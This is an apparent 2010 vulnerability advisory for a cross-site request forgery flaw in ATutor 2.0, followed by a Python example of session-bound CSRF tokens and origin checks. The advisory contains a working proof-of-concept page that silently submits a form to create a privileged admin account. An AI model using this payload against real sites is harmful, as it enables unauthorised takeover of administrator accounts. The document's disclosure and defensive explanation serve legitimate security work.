
atutor-xsrf.txt

Posted on 06 July 2010

<!------------------------------------------------------------------------
# Software................ATutor 2.0
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.atutor.ca/atutor/
# Release Date............7/5/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in ATutor 2.0 can be
# exploited to create a new admin (new_admin/Password1).
#
#
# --PoC-->
<html>
<body onload="document.forms[0].submit.click()">
<form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
<input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
<input type="hidden" name="password_error" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="confirm_password" value="" />
<input type="hidden" name="real_name" value="" />
<input type="hidden" name="email" value="x@x.com" />
<input type="hidden" name="priv_admin" value="1" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
</html>
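The PoC works because the admin-creation handler accepts any POST that arrives with the victim's session cookie, and the browser attaches that cookie even when the form lives on a third-party page. The example below is an added illustration, not ATutor's code, of the two checks that close this class of bug: a synchronizer token bound to the session with an HMAC, and an Origin/Referer check as defence in depth. The names SERVER_SECRET, SITE_ORIGIN, csrf_token, Request and handle_create_admin are assumptions for the demo, the secret is a constructed placeholder, and the three requests (one forged from an attacker-controlled origin as in the PoC, one replaying a token minted for another session, one legitimate) are constructed inline.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumption: a server-side secret loaded from configuration. The literal here
# is a constructed placeholder for the stand-alone demo, not a real key.
SERVER_SECRET = b"constructed-demo-secret"

# Assumption: the site's own origin; the PoC above targets http://localhost.
SITE_ORIGIN = "http://localhost"


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token: a random nonce tied to the user's session with an
    HMAC, so a token minted for one session cannot be replayed in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def same_origin(headers: Dict[str, str]) -> bool:
    """Defence in depth: accept only if the browser says the request came from
    our own origin. A missing header is treated as cross-site for a state change."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer")
    if referer is not None:
        return referer == SITE_ORIGIN or referer.startswith(SITE_ORIGIN + "/")
    return False


@dataclass
class Request:
    """Minimal stand-in for an HTTP request; session_id is what the server
    resolved from the session cookie the browser attached automatically."""
    method: str
    headers: Dict[str, str]
    form: Dict[str, str]
    session_id: str


def handle_create_admin(req: Request, admins: List[str]) -> Tuple[int, str]:
    """Hypothetical hardened admin-creation handler (not ATutor's create.php)."""
    if req.method != "POST":
        return 405, "method not allowed"
    if not same_origin(req.headers):
        return 403, "cross-origin request rejected"
    if not verify_csrf_token(req.session_id, req.form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    login = req.form.get("login", "").strip()
    if not login:
        return 400, "login required"
    admins.append(login)
    return 200, f"admin {login} created"


def run_demo() -> Dict[str, object]:
    """Constructed requests: one forged by a third-party page (as in the PoC),
    one replaying another session's token, one from the site's own form."""
    admins: List[str] = []
    admin_session = "session-of-logged-in-admin"

    # The victim's browser attaches the admin session cookie, but the attacker's
    # page cannot read our token and the Origin header names the attacker's site.
    forged = Request("POST", {"Origin": "http://attacker.example"},
                     {"login": "new_admin", "priv_admin": "1"}, admin_session)
    replayed = Request("POST", {"Origin": SITE_ORIGIN},
                       {"login": "new_admin", "csrf_token": issue_csrf_token("someone-else")},
                       admin_session)
    legit = Request("POST", {"Origin": SITE_ORIGIN},
                    {"login": "new_admin", "priv_admin": "1",
                     "csrf_token": issue_csrf_token(admin_session)}, admin_session)
    return {
        "forged": handle_create_admin(forged, admins),
        "replayed": handle_create_admin(replayed, admins),
        "legit": handle_create_admin(legit, admins),
        "admins": admins,
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Binding the nonce to the session with an HMAC means the server does not have to store issued tokens, and a token leaked or minted for one session is useless in another; the origin check alone is not sufficient (some clients strip Referer, and older browsers omit Origin), which is why the token remains the primary control and the header check only adds a second layer.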